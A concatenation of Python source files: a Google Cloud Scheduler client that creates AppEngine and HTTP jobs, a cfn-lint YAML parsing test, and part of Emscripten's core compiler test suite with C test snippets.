'Service account key file or service account name is not provided. '
'Provide either path to service account key file or name of the '
'service account.')
if service_account_key_file:
credentials = cloud_auth.get_credentials(service_account_key_file)
self._client = cloud_auth.build_service_client(_CLIENT_NAME, credentials)
else:
self._client = cloud_auth.build_impersonated_client(
_CLIENT_NAME, service_account_name, version)
self._parent = f'projects/{project_id}/locations/{location}'
def create_appengine_http_job(self,
name: str,
description: str,
schedule: str,
target: AppEngineTarget,
timezone: Optional[str] = _TIMEZONE) -> str:
"""Creates a new AppEngine HTTP job.
Args:
name: The name of the job.
description: The description of the job.
schedule: A cron-style schedule string.
target: An AppEngineTarget instance containing the job target information.
timezone: The timezone where of the job.
Returns:
The job name.
Raises:
Error: If the request was not processed successfully.
"""
request_body = {
'name': name,
'description': description,
'schedule': schedule,
'timeZone': timezone,
'appEngineHttpTarget': {
'httpMethod': target.http_method,
'appEngineRouting': {
'service': target.service
},
'relativeUri': target.relative_uri
}
}
return self._create_job(request_body)
def create_http_job(self,
name: str,
description: str,
schedule: str,
target: HttpTarget,
timezone: Optional[str] = _TIMEZONE) -> str:
"""Creates a new HTTP job.
Args:
name: The name of the job.
description: The description of the job.
schedule: A cron-style schedule string.
target: An HttpTarget instance containing the job target information.
timezone: The timezone where of the job.
Returns:
The job name.
Raises:
Error: If the request was not processed successfully.
"""
request_body = {
'name': name,
'description': description,
'schedule': schedule,
'timeZone': timezone,
'httpTarget': {
'uri': target.uri,
'httpMethod': target.http_method,
'headers': target.headers,
'body': target.body
}
}
if target.authorization_header_type == 'oauthToken':
request_body['httpTarget'][target.authorization_header_type] = {
'serviceAccountEmail': target.authorization_header[0],
'scope': target.authorization_header[1]
}
elif target.authorization_header_type == 'oidcToken':
request_body['httpTarget'][target.authorization_header_type] = {
'serviceAccountEmail': target.authorization_header[0],
'audience': target.authorization_header[1]
}
return self._create_job(request_body)
def _create_job(self, request_body: Dict[str, Any]) -> str:
"""Creates a new Cloud Scheduler job.
Args:
request_body: A dictionary representing a Job instance.
Returns:
The job name.
Raises:
Error: If the request was not processed successfully.
"""
try:
job = self._client.projects().locations().jobs().create(
parent=self._parent,
body=request_body)
result = job.execute()
return result.name
except errors.HttpError as error:
logging.exception('Error occurred while creating job: %s', error)
raise Error(f'Error occurred while creating job: {error}')
|
py | 7dfac142b42345c1192b00150605f2af852e1c37 | """
Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
from test.testlib.testcase import BaseTestCase
from six import StringIO
from mock import patch
from cfnlint import Template # pylint: disable=E0401
from cfnlint.rules import RulesCollection
from cfnlint.core import DEFAULT_RULESDIR # pylint: disable=E0401
import cfnlint.decode.cfn_yaml # pylint: disable=E0401
class TestYamlParse(BaseTestCase):
"""Test YAML Parsing """
def setUp(self):
""" SetUp template object"""
self.rules = RulesCollection()
rulesdirs = [DEFAULT_RULESDIR]
for rulesdir in rulesdirs:
self.rules.create_from_directory(rulesdir)
self.filenames = {
"config_rule": {
"filename": 'test/fixtures/templates/public/lambda-poller.yaml',
"failures": 1
},
"generic_bad": {
"filename": 'test/fixtures/templates/bad/generic.yaml',
"failures": 35
}
}
def test_success_parse(self):
"""Test Successful YAML Parsing"""
for _, values in self.filenames.items():
filename = values.get('filename')
failures = values.get('failures')
template = cfnlint.decode.cfn_yaml.load(filename)
cfn = Template(filename, template, ['us-east-1'])
matches = []
matches.extend(self.rules.run(filename, cfn))
assert len(matches) == failures, 'Expected {} failures, got {} on {}'.format(
failures, len(matches), filename)
def test_success_parse_stdin(self):
"""Test Successful YAML Parsing through stdin"""
for _, values in self.filenames.items():
filename = '-'
failures = values.get('failures')
with open(values.get('filename'), 'r') as fp:
file_content = fp.read()
with patch('sys.stdin', StringIO(file_content)):
template = cfnlint.decode.cfn_yaml.load(filename)
cfn = Template(filename, template, ['us-east-1'])
matches = []
matches.extend(self.rules.run(filename, cfn))
assert len(matches) == failures, 'Expected {} failures, got {} on {}'.format(
failures, len(matches), values.get('filename'))
|
py | 7dfac2dc7102ff8c7693908c9e7e00124ae8d570 | # Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import hashlib
import json
import logging
import os
import random
import re
import shutil
import sys
import time
import unittest
from pathlib import Path
from functools import wraps
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner')
from tools.shared import try_delete, PIPE
from tools.shared import PYTHON, EMCC, EMAR
from tools.utils import WINDOWS, MACOS
from tools import shared, building, config, webassembly
from common import RunnerCore, path_from_root, requires_native_clang, test_file, create_file
from common import skip_if, needs_dylink, no_windows, no_mac, is_slow_test, parameterized
from common import env_modify, with_env_modify, disabled, node_pthreads
from common import read_file, read_binary, require_node, require_v8
from common import NON_ZERO, WEBIDL_BINDER, EMBUILDER
import clang_native
# decorators for limiting which modes a test can run in
logger = logging.getLogger("test_core")
def wasm_simd(f):
def decorated(self):
self.require_v8()
if not self.is_wasm():
self.skipTest('wasm2js only supports MVP for now')
if '-O3' in self.emcc_args:
self.skipTest('SIMD tests are too slow with -O3 in the new LLVM pass manager, https://github.com/emscripten-core/emscripten/issues/13427')
self.emcc_args.append('-msimd128')
self.emcc_args.append('-fno-lax-vector-conversions')
self.v8_args.append('--experimental-wasm-simd')
f(self)
return decorated
def wasm_relaxed_simd(f):
def decorated(self):
# We don't actually run any tests yet, so don't require any engines.
if not self.is_wasm():
self.skipTest('wasm2js only supports MVP for now')
self.emcc_args.append('-mrelaxed-simd')
f(self)
return decorated
def needs_non_trapping_float_to_int(f):
def decorated(self):
if not self.is_wasm():
self.skipTest('wasm2js only supports MVP for now')
f(self)
return decorated
def also_with_wasm_bigint(f):
assert callable(f)
def metafunc(self, with_bigint):
assert self.get_setting('WASM_BIGINT') is None
if with_bigint:
if not self.is_wasm():
self.skipTest('wasm2js does not support WASM_BIGINT')
self.set_setting('WASM_BIGINT')
self.require_node()
self.node_args.append('--experimental-wasm-bigint')
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'bigint': (True,)}
return metafunc
# without EMTEST_ALL_ENGINES set we only run tests in a single VM by
# default. in some tests we know that cross-VM differences may happen and
# so are worth testing, and they should be marked with this decorator
def all_engines(f):
def decorated(self):
old = self.use_all_engines
self.use_all_engines = True
self.set_setting('ENVIRONMENT', 'web,node,shell')
try:
f(self)
finally:
self.use_all_engines = old
return decorated
# Tests exception handling / setjmp/longjmp handling in Emscripten EH/SjLj mode
# and if possible, new wasm EH/SjLj mode. This tests two combinations:
# - Emscripten EH + Emscripten SjLj
# - Wasm EH + Wasm SjLj
def with_both_eh_sjlj(f):
assert callable(f)
def metafunc(self, is_native):
if is_native:
# Wasm EH is currently supported only in wasm backend and V8
if not self.is_wasm():
self.skipTest('wasm2js does not support wasm EH/SjLj')
self.require_v8()
# FIXME Temporarily disabled. Enable this later when the bug is fixed.
if '-fsanitize=address' in self.emcc_args:
self.skipTest('Wasm EH does not work with asan yet')
self.emcc_args.append('-fwasm-exceptions')
self.set_setting('SUPPORT_LONGJMP', 'wasm')
self.v8_args.append('--experimental-wasm-eh')
f(self)
else:
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
self.set_setting('SUPPORT_LONGJMP', 'emscripten')
# DISABLE_EXCEPTION_CATCHING=0 exports __cxa_can_catch and
# __cxa_is_pointer_type, so if we don't build in C++ mode, wasm-ld will
# error out because libc++abi is not included. See
# https://github.com/emscripten-core/emscripten/pull/14192 for details.
self.set_setting('DEFAULT_TO_CXX')
f(self)
metafunc._parameterize = {'': (False,),
'wasm': (True,)}
return metafunc
def no_wasm2js(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm2js', note)
return decorated
def also_with_noderawfs(func):
assert callable(func)
def metafunc(self, rawfs):
if rawfs:
self.emcc_args += ['-DNODERAWFS']
self.set_setting('NODERAWFS')
self.js_engines = [config.NODE_JS]
func(self)
metafunc._parameterize = {'': (False,),
'rawfs': (True,)}
return metafunc
def can_do_standalone(self):
return self.is_wasm() and \
self.get_setting('STACK_OVERFLOW_CHECK', 0) < 2 and \
not self.get_setting('MINIMAL_RUNTIME') and \
not self.get_setting('SAFE_HEAP') and \
not self.get_setting('MEMORY64') and \
'-fsanitize=address' not in self.emcc_args and \
'-fsanitize=leak' not in self.emcc_args
def also_with_wasmfs(func):
def decorated(self):
func(self)
if self.get_setting('WASMFS'):
# Nothing more to test.
return
print('wasmfs')
if self.get_setting('STANDALONE_WASM'):
self.skipTest("test currently cannot run both with WASMFS and STANDALONE_WASM")
if self.get_setting('MEMORY64'):
self.skipTest("test currently cannot run both with WASMFS and WASMFS")
self.set_setting('WASMFS')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
func(self)
return decorated
# Similar to also_with_wasmfs, but also enables the full JS API
def also_with_wasmfs_js(func):
def decorated(self):
func(self)
print('wasmfs')
if self.get_setting('STANDALONE_WASM'):
self.skipTest("test currently cannot run both with WASMFS and STANDALONE_WASM")
if self.get_setting('MEMORY64'):
self.skipTest("test currently cannot run both with WASMFS and WASMFS")
self.set_setting('WASMFS')
self.set_setting('FORCE_FILESYSTEM')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
func(self)
return decorated
# Impure means a test that cannot run in a wasm VM yet, as it is not 100%
# standalone. We can still run them with the JS code though.
def also_with_standalone_wasm(wasm2c=False, impure=False):
def decorated(func):
def metafunc(self, standalone):
if not standalone:
func(self)
else:
if not can_do_standalone(self):
self.skipTest('Test configuration is not compatible with STANDALONE_WASM')
self.set_setting('STANDALONE_WASM')
# we will not legalize the JS ffi interface, so we must use BigInt
# support in order for JS to have a chance to run this without trapping
# when it sees an i64 on the ffi.
self.set_setting('WASM_BIGINT')
self.emcc_args.append('-Wno-unused-command-line-argument')
# if we are impure, disallow all wasm engines
if impure:
self.wasm_engines = []
self.js_engines = [config.NODE_JS]
self.node_args.append('--experimental-wasm-bigint')
func(self)
if wasm2c:
print('wasm2c')
self.set_setting('WASM2C')
self.wasm_engines = []
func(self)
metafunc._parameterize = {'': (False,),
'standalone': (True,)}
return metafunc
return decorated
def no_optimize(note=''):
assert not callable(note)
def decorator(func):
assert callable(func)
def decorated(self):
if self.is_optimizing():
self.skipTest(note)
func(self)
return decorated
return decorator
def needs_make(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip('Tool not available on Windows bots (%s)' % note)
return lambda f: f
def no_asan(note):
assert not callable(note)
def decorator(f):
assert callable(f)
@wraps(f)
def decorated(self, *args, **kwargs):
if '-fsanitize=address' in self.emcc_args:
self.skipTest(note)
f(self, *args, **kwargs)
return decorated
return decorator
def no_lsan(note):
assert not callable(note)
def decorator(f):
assert callable(f)
@wraps(f)
def decorated(self, *args, **kwargs):
if '-fsanitize=leak' in self.emcc_args:
self.skipTest(note)
f(self, *args, **kwargs)
return decorated
return decorator
def no_memory64(note):
assert not callable(note)
def decorator(f):
assert callable(f)
@wraps(f)
def decorated(self, *args, **kwargs):
if self.get_setting('MEMORY64'):
self.skipTest(note)
f(self, *args, **kwargs)
return decorated
return decorator
def no_wasmfs(note):
assert not callable(note)
def decorator(f):
assert callable(f)
@wraps(f)
def decorated(self, *args, **kwargs):
if self.get_setting('WASMFS'):
self.skipTest(note)
f(self, *args, **kwargs)
return decorated
return decorator
def make_no_decorator_for_setting(name):
def outer_decorator(note):
assert not callable(note)
def decorator(f):
assert callable(f)
@wraps(f)
def decorated(self, *args, **kwargs):
if (name + '=1') in self.emcc_args or self.get_setting(name):
self.skipTest(note)
f(self, *args, **kwargs)
return decorated
return decorator
return outer_decorator
no_minimal_runtime = make_no_decorator_for_setting('MINIMAL_RUNTIME')
no_safe_heap = make_no_decorator_for_setting('SAFE_HEAP')
def is_sanitizing(args):
return '-fsanitize=' in str(args)
class TestCoreBase(RunnerCore):
def is_wasm2js(self):
return self.get_setting('WASM') == 0
# A simple check whether the compiler arguments cause optimization.
def is_optimizing(self):
return '-O' in str(self.emcc_args) and '-O0' not in self.emcc_args
def should_use_closure(self):
# Don't run closure in all test modes, just a couple, since it slows
# the tests down quite a bit.
required = ('-O2', '-Os')
prohibited = ('-g', '--profiling')
return all(f not in self.emcc_args for f in prohibited) and any(f in self.emcc_args for f in required)
# Use closure in some tests for some additional coverage
def maybe_closure(self):
if '--closure=1' not in self.emcc_args and self.should_use_closure():
self.emcc_args += ['--closure=1']
logger.debug('using closure compiler..')
return True
return False
def assertStartswith(self, output, prefix):
self.assertEqual(prefix, output[:len(prefix)])
def verify_in_strict_mode(self, filename):
js = read_file(filename)
filename += '.strict.js'
with open(filename, 'w') as outfile:
outfile.write('"use strict";\n' + js)
self.run_js(filename)
def do_core_test(self, testname, **kwargs):
self.do_run_in_out_file_test(Path('core', testname), **kwargs)
def get_bullet_library(self, use_cmake):
if use_cmake:
configure_commands = ['cmake', '.']
configure_args = ['-DBUILD_DEMOS=OFF', '-DBUILD_EXTRAS=OFF', '-DUSE_GLUT=OFF']
# Depending on whether 'configure' or 'cmake' is used to build, Bullet
# places output files in different directory structures.
generated_libs = [Path('src/BulletDynamics/libBulletDynamics.a'),
Path('src/BulletCollision/libBulletCollision.a'),
Path('src/LinearMath/libLinearMath.a')]
else:
configure_commands = ['sh', './configure']
# Force a nondefault --host= so that the configure script will interpret
# that we are doing cross-compilation
# and skip attempting to run the generated executable with './a.out',
# which would fail since we are building a .js file.
configure_args = ['--disable-shared', '--host=i686-pc-linux-gnu',
'--disable-demos', '--disable-dependency-tracking']
generated_libs = [Path('src/.libs/libBulletDynamics.a'),
Path('src/.libs/libBulletCollision.a'),
Path('src/.libs/libLinearMath.a')]
return self.get_library('third_party/bullet', generated_libs,
configure=configure_commands,
configure_args=configure_args,
cache_name_extra=configure_commands[0])
@also_with_standalone_wasm()
@also_with_wasmfs
def test_hello_world(self):
self.do_core_test('test_hello_world.c')
# must not emit this unneeded internal thing
self.assertNotContained('EMSCRIPTEN_GENERATED_FUNCTIONS', read_file('test_hello_world.js'))
def test_wasm_synchronous_compilation(self):
self.set_setting('STRICT_JS')
self.set_setting('WASM_ASYNC_COMPILATION', 0)
self.do_core_test('test_hello_world.c')
@also_with_standalone_wasm()
def test_hello_argc(self):
self.do_core_test('test_hello_argc.c')
@also_with_wasmfs
def test_intvars(self):
self.do_core_test('test_intvars.cpp')
@also_with_wasmfs
def test_sintvars(self):
self.do_core_test('test_sintvars.c')
def test_int53(self):
self.emcc_args += ['-sDEFAULT_LIBRARY_FUNCS_TO_INCLUDE=[$convertI32PairToI53,$convertU32PairToI53,$readI53FromU64,$readI53FromI64,$writeI53ToI64,$writeI53ToI64Clamped,$writeI53ToU64Clamped,$writeI53ToI64Signaling,$writeI53ToU64Signaling]']
self.do_core_test('test_int53.c', interleaved_output=False)
def test_i64(self):
self.do_core_test('test_i64.c')
def test_i64_2(self):
self.do_core_test('test_i64_2.cpp')
def test_i64_3(self):
self.do_core_test('test_i64_3.cpp')
def test_i64_4(self):
# stuff that also needs sign corrections
self.do_core_test('test_i64_4.c')
def test_i64_b(self):
self.do_core_test('test_i64_b.cpp')
def test_i64_cmp(self):
self.do_core_test('test_i64_cmp.cpp')
def test_i64_cmp2(self):
self.do_core_test('test_i64_cmp2.c')
def test_i64_double(self):
self.do_core_test('test_i64_double.cpp')
def test_i64_umul(self):
self.do_core_test('test_i64_umul.c')
@also_with_standalone_wasm()
def test_i64_precise(self):
self.do_core_test('test_i64_precise.c')
def test_i64_precise_needed(self):
self.do_core_test('test_i64_precise_needed.c')
def test_i64_llabs(self):
self.do_core_test('test_i64_llabs.c')
def test_i64_zextneg(self):
self.do_core_test('test_i64_zextneg.c')
def test_i64_7z(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_i64_7z.c', args=['hallo'])
def test_i64_i16(self):
self.do_core_test('test_i64_i16.c')
def test_i64_qdouble(self):
self.do_core_test('test_i64_qdouble.c')
def test_i64_varargs(self):
self.do_core_test('test_i64_varargs.c', args='waka fleefl asdfasdfasdfasdf'.split())
@no_wasm2js('wasm_bigint')
def test_i64_invoke_bigint(self):
self.set_setting('WASM_BIGINT')
self.emcc_args += ['-fexceptions']
self.node_args += ['--experimental-wasm-bigint']
self.do_core_test('test_i64_invoke_bigint.cpp', js_engines=[config.NODE_JS])
def test_vararg_copy(self):
self.do_run_in_out_file_test('va_arg/test_va_copy.c')
def test_llvm_fabs(self):
self.do_core_test('test_llvm_fabs.c')
def test_double_varargs(self):
self.do_core_test('test_double_varargs.c')
def test_trivial_struct_varargs(self):
self.do_core_test('test_trivial_struct_varargs.c')
def test_struct_varargs(self):
self.do_core_test('test_struct_varargs.c')
def test_zero_struct_varargs(self):
self.do_core_test('test_zero_struct_varargs.c')
def zzztest_nested_struct_varargs(self):
self.do_core_test('test_nested_struct_varargs.c')
def test_i32_mul_precise(self):
self.do_core_test('test_i32_mul_precise.c')
def test_i16_emcc_intrinsic(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_i16_emcc_intrinsic.c')
def test_double_i64_conversion(self):
self.do_core_test('test_double_i64_conversion.c')
def test_float32_precise(self):
self.do_core_test('test_float32_precise.c')
def test_negative_zero(self):
self.do_core_test('test_negative_zero.c')
def test_literal_negative_zero(self):
self.do_core_test('test_literal_negative_zero.c')
@also_with_standalone_wasm()
def test_bswap64(self):
self.do_core_test('test_bswap64.cpp')
def test_sha1(self):
self.do_runf(test_file('sha1.c'), 'SHA1=15dd99a1991e0b3826fede3deffc1feba42278e6')
@no_memory64('tests 32-bit specific sizes')
def test_wasm32_unknown_emscripten(self):
# No other configuration is supported, so always run this.
self.do_runf(test_file('wasm32-unknown-emscripten.c'), '')
def test_cube2md5(self):
self.emcc_args += ['--embed-file', 'cube2md5.txt']
shutil.copyfile(test_file('cube2md5.txt'), 'cube2md5.txt')
self.do_run_from_file(test_file('cube2md5.cpp'), test_file('cube2md5.ok'), assert_returncode=NON_ZERO)
@also_with_standalone_wasm(wasm2c=True)
@needs_make('make')
def test_cube2hash(self):
# A good test of i64 math
self.do_run('// empty file', 'Usage: hashstring <seed>',
libraries=self.get_library('third_party/cube2hash', ['libcube2hash.a'], configure=None),
includes=[test_file('third_party/cube2hash')], assert_returncode=NON_ZERO)
for text, output in [('fleefl', '892BDB6FD3F62E863D63DA55851700FDE3ACF30204798CE9'),
('fleefl2', 'AA2CC5F96FC9D540CA24FDAF1F71E2942753DB83E8A81B61'),
('64bitisslow', '64D8470573635EC354FEE7B7F87C566FCAF1EFB491041670')]:
self.do_run('src.js', 'hash value: ' + output, args=[text], no_build=True)
def test_unaligned(self):
self.skipTest('LLVM marks the reads of s as fully aligned, making this test invalid')
src = r'''
#include <stdio.h>
struct S {
double x;
int y;
};
int main() {
// the 64-bit value here will not be 8-byte aligned
S s0[3] = { {0x12a751f430142, 22}, {0x17a5c85bad144, 98}, {1, 1}};
char buffer[10*sizeof(S)];
int b = int(buffer);
S *s = (S*)(b + 4-b%8);
s[0] = s0[0];
s[1] = s0[1];
s[2] = s0[2];
printf("*%d : %d : %d\n", sizeof(S), ((unsigned long)&s[0]) % 8 != ((unsigned long)&s[1]) % 8,
((unsigned long)&s[1]) - ((unsigned long)&s[0]));
s[0].x++;
s[0].y++;
s[1].x++;
s[1].y++;
printf("%.1f,%d,%.1f,%d\n", s[0].x, s[0].y, s[1].x, s[1].y);
return 0;
}
'''
# TODO: A version of this with int64s as well
self.do_run(src, '*12 : 1 : 12\n328157500735811.0,23,416012775903557.0,99\n')
return # TODO: continue to the next part here
# Test for undefined behavior in C. This is not legitimate code, but does exist
src = r'''
#include <stdio.h>
int main()
{
int x[10];
char *p = (char*)&x[0];
p++;
short *q = (short*)p;
*q = 300;
printf("*%d:%ld*\n", *q, ((long)q)%2);
int *r = (int*)p;
*r = 515559;
printf("*%d*\n", *r);
long long *t = (long long*)p;
*t = 42949672960;
printf("*%lld*\n", *t);
return 0;
}
'''
try:
self.do_run(src, '*300:1*\n*515559*\n*42949672960*\n')
except Exception as e:
assert 'must be aligned' in str(e), e # expected to fail without emulation
def test_align64(self):
src = r'''
#include <stdio.h>
// inspired by poppler
enum Type {
A = 10,
B = 20
};
struct Object {
Type type;
union {
int intg;
double real;
char *name;
};
};
struct Principal {
double x;
Object a;
double y;
};
int main(int argc, char **argv)
{
int base = argc-1;
Object *o = NULL;
printf("%zu,%zu\n", sizeof(Object), sizeof(Principal));
printf("%ld,%ld,%ld,%ld\n", (long)&o[base].type, (long)&o[base].intg, (long)&o[base].real, (long)&o[base].name);
printf("%ld,%ld,%ld,%ld\n", (long)&o[base+1].type, (long)&o[base+1].intg, (long)&o[base+1].real, (long)&o[base+1].name);
Principal p, q;
p.x = p.y = q.x = q.y = 0;
p.a.type = A;
p.a.real = 123.456;
*(&q.a) = p.a;
printf("%.2f,%d,%.2f,%.2f : %.2f,%d,%.2f,%.2f\n", p.x, p.a.type, p.a.real, p.y, q.x, q.a.type, q.a.real, q.y);
return 0;
}
'''
self.do_run(src, '''16,32
0,8,8,8
16,24,24,24
0.00,10,123.46,0.00 : 0.00,10,123.46,0.00
''')
@no_asan('asan errors on corner cases we check')
@no_lsan('lsan errors on corner cases we check')
def test_aligned_alloc(self):
self.do_runf(test_file('test_aligned_alloc.c'), '',
emcc_args=['-Wno-non-power-of-two-alignment'])
def test_unsigned(self):
src = '''
#include <stdio.h>
const signed char cvals[2] = { -1, -2 }; // compiler can store this is a string, so -1 becomes \\FF, and needs re-signing
int main()
{
{
unsigned char x = 200;
printf("*%d*\\n", x);
unsigned char y = -22;
printf("*%d*\\n", y);
}
int varey = 100;
unsigned int MAXEY = -1, MAXEY2 = -77;
printf("*%u,%d,%u*\\n", MAXEY, varey >= MAXEY, MAXEY2); // 100 >= -1? not in unsigned!
int y = cvals[0];
printf("*%d,%d,%d,%d*\\n", cvals[0], cvals[0] < 0, y, y < 0);
y = cvals[1];
printf("*%d,%d,%d,%d*\\n", cvals[1], cvals[1] < 0, y, y < 0);
// zext issue - see mathop in jsifier
unsigned char x8 = -10;
unsigned long hold = 0;
hold += x8;
int y32 = hold+50;
printf("*%lu,%d*\\n", hold, y32);
// Comparisons
x8 = 0;
for (int i = 0; i < 254; i++) x8++; // make it an actual 254 in JS - not a -2
printf("*%d,%d*\\n", x8+1 == 0xff, x8+1 != 0xff); // 0xff may be '-1' in the bitcode
return 0;
}
'''
self.do_run(src, '*4294967295,0,4294967219*\n*-1,1,-1,1*\n*-2,1,-2,1*\n*246,296*\n*1,0*')
self.emcc_args.append('-Wno-constant-conversion')
src = '''
#include <stdio.h>
int main()
{
{
unsigned char x;
unsigned char *y = &x;
*y = -1;
printf("*%d*\\n", x);
}
{
unsigned short x;
unsigned short *y = &x;
*y = -1;
printf("*%d*\\n", x);
}
/*{ // This case is not checked. The hint for unsignedness is just the %u in printf, and we do not analyze that
unsigned int x;
unsigned int *y = &x;
*y = -1;
printf("*%u*\\n", x);
}*/
{
char x;
char *y = &x;
*y = 255;
printf("*%d*\\n", x);
}
{
char x;
char *y = &x;
*y = 65535;
printf("*%d*\\n", x);
}
{
char x;
char *y = &x;
*y = 0xffffffff;
printf("*%d*\\n", x);
}
return 0;
}
'''
self.do_run(src, '*255*\n*65535*\n*-1*\n*-1*\n*-1*')
def test_bitfields(self):
self.do_core_test('test_bitfields.c')
def test_floatvars(self):
self.do_core_test('test_floatvars.cpp')
def test_closebitcasts(self):
self.do_core_test('closebitcasts.c')
def test_fast_math(self):
self.emcc_args += ['-ffast-math']
self.do_core_test('test_fast_math.c', args=['5', '6', '8'])
def test_zerodiv(self):
self.do_core_test('test_zerodiv.c')
def test_zero_multiplication(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_zero_multiplication.c')
def test_isnan(self):
self.do_core_test('test_isnan.c')
def test_globaldoubles(self):
self.do_core_test('test_globaldoubles.c')
def test_math(self):
self.do_core_test('test_math.c')
def test_erf(self):
self.do_core_test('test_erf.c')
def test_math_hyperbolic(self):
self.do_core_test('test_math_hyperbolic.c')
def test_math_lgamma(self):
self.do_run_in_out_file_test('math/lgamma.c', assert_returncode=NON_ZERO)
def test_math_fmodf(self):
self.do_run_in_out_file_test('math/fmodf.c')
def test_frexp(self):
self.do_core_test('test_frexp.c')
def test_rounding(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_rounding.c')
def test_fcvt(self):
self.do_core_test('test_fcvt.cpp')
def test_llrint(self):
self.do_core_test('test_llrint.c')
def test_getgep(self):
# Generated code includes getelementptr (getelementptr, 0, 1), i.e., GEP as the first param to GEP
self.do_core_test('test_getgep.c')
def test_multiply_defined_symbols(self):
create_file('a1.c', 'int f() { return 1; }')
create_file('a2.c', 'void x() {}')
create_file('b1.c', 'int f() { return 2; }')
create_file('b2.c', 'void y() {}')
create_file('main.c', r'''
#include <stdio.h>
int f();
int main() {
printf("result: %d\n", f());
return 0;
}
''')
self.emcc('a1.c', ['-c'])
self.emcc('a2.c', ['-c'])
self.emcc('b1.c', ['-c'])
self.emcc('b2.c', ['-c'])
self.emcc('main.c', ['-c'])
building.emar('cr', 'liba.a', ['a1.c.o', 'a2.c.o'])
building.emar('cr', 'libb.a', ['b1.c.o', 'b2.c.o'])
building.link_to_object(['main.c.o', 'liba.a', 'libb.a'], 'all.o')
self.emcc('all.o', self.get_emcc_args(), 'all.js')
self.do_run('all.js', 'result: 1', no_build=True)
def test_if(self):
self.do_core_test('test_if.c')
def test_if_else(self):
self.do_core_test('test_if_else.c')
def test_loop(self):
self.do_core_test('test_loop.c')
def test_stack(self):
self.set_setting('INLINING_LIMIT')
# some extra coverage in all test suites for stack checks
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.do_core_test('test_stack.c')
def test_stack_align(self):
src = test_file('core/test_stack_align.cpp')
def test():
self.do_runf(src, ['''align 4: 0
align 8: 0
align 16: 0
align 32: 0
base align: 0, 0, 0, 0'''])
test()
@no_asan('stack size is too low for asan to work properly')
def test_stack_placement(self):
self.set_setting('TOTAL_STACK', 1024)
self.do_core_test('test_stack_placement.c')
self.set_setting('GLOBAL_BASE', 102400)
self.do_core_test('test_stack_placement.c')
@no_asan('asan does not support main modules')
@no_lsan('asan does not support main modules')
@no_wasm2js('MAIN_MODULE support')
def test_stack_placement_pic(self):
self.set_setting('TOTAL_STACK', 1024)
self.set_setting('MAIN_MODULE')
self.do_core_test('test_stack_placement.c')
self.set_setting('GLOBAL_BASE', 102400)
self.do_core_test('test_stack_placement.c')
def test_strings(self):
self.do_core_test('test_strings.c', args=['wowie', 'too', '74'])
def test_strcmp_uni(self):
self.do_core_test('test_strcmp_uni.c')
def test_strndup(self):
self.do_core_test('test_strndup.c')
def test_errar(self):
self.do_core_test('test_errar.c')
def test_mainenv(self):
self.do_core_test('test_mainenv.c')
def test_funcs(self):
self.do_core_test('test_funcs.c')
def test_structs(self):
self.do_core_test('test_structs.c')
gen_struct_src = '''
#include <stdio.h>
#include <stdlib.h>
#include "emscripten.h"
struct S
{
int x, y;
};
int main()
{
S* a = {{gen_struct}};
a->x = 51; a->y = 62;
printf("*%d,%d*\\n", a->x, a->y);
{{del_struct}}(a);
return 0;
}
'''
def test_mallocstruct(self):
self.do_run(self.gen_struct_src.replace('{{gen_struct}}', '(S*)malloc(sizeof(S))').replace('{{del_struct}}', 'free'), '*51,62*')
@no_asan('ASan does not support custom memory allocators')
@no_lsan('LSan does not support custom memory allocators')
@parameterized({
'normal': [],
'memvalidate': ['-DEMMALLOC_MEMVALIDATE'],
'memvalidate_verbose': ['-DEMMALLOC_MEMVALIDATE', '-DEMMALLOC_VERBOSE', '-DRANDOM_ITERS=130'],
})
def test_emmalloc(self, *args):
# in newer clang+llvm, the internal calls to malloc in emmalloc may be optimized under
# the assumption that they are external, so like in system_libs.py where we build
# malloc, we need to disable builtin here too
self.set_setting('MALLOC', 'none')
self.emcc_args += ['-fno-builtin'] + list(args)
self.do_run(read_file(path_from_root('system/lib/emmalloc.c')) +
read_file(path_from_root('system/lib/sbrk.c')) +
read_file(test_file('core/test_emmalloc.c')),
read_file(test_file('core/test_emmalloc.out')), force_c=True)
@no_asan('ASan does not support custom memory allocators')
@no_lsan('LSan does not support custom memory allocators')
def test_emmalloc_usable_size(self, *args):
self.set_setting('MALLOC', 'emmalloc')
self.emcc_args += list(args)
self.do_core_test('test_malloc_usable_size.c')
@no_optimize('output is sensitive to optimization flags, so only test unoptimized builds')
@no_asan('ASan does not support custom memory allocators')
@no_lsan('LSan does not support custom memory allocators')
def test_emmalloc_memory_statistics(self, *args):
self.set_setting('MALLOC', 'emmalloc')
self.emcc_args += ['-sINITIAL_MEMORY=128MB', '-g'] + list(args)
self.do_core_test('test_emmalloc_memory_statistics.cpp')
@no_optimize('output is sensitive to optimization flags, so only test unoptimized builds')
@no_asan('ASan does not support custom memory allocators')
@no_lsan('LSan does not support custom memory allocators')
def test_emmalloc_trim(self, *args):
self.set_setting('MALLOC', 'emmalloc')
self.emcc_args += ['-sINITIAL_MEMORY=128MB', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=2147418112'] + list(args)
self.do_core_test('test_emmalloc_trim.cpp')
# Test case against https://github.com/emscripten-core/emscripten/issues/10363
def test_emmalloc_memalign_corruption(self, *args):
self.set_setting('MALLOC', 'emmalloc')
self.do_core_test('emmalloc_memalign_corruption.cpp')
def test_newstruct(self):
self.do_run(self.gen_struct_src.replace('{{gen_struct}}', 'new S').replace('{{del_struct}}', 'delete'), '*51,62*')
def test_addr_of_stacked(self):
self.do_core_test('test_addr_of_stacked.c')
def test_globals(self):
self.do_core_test('test_globals.c')
def test_linked_list(self):
self.do_core_test('test_linked_list.c')
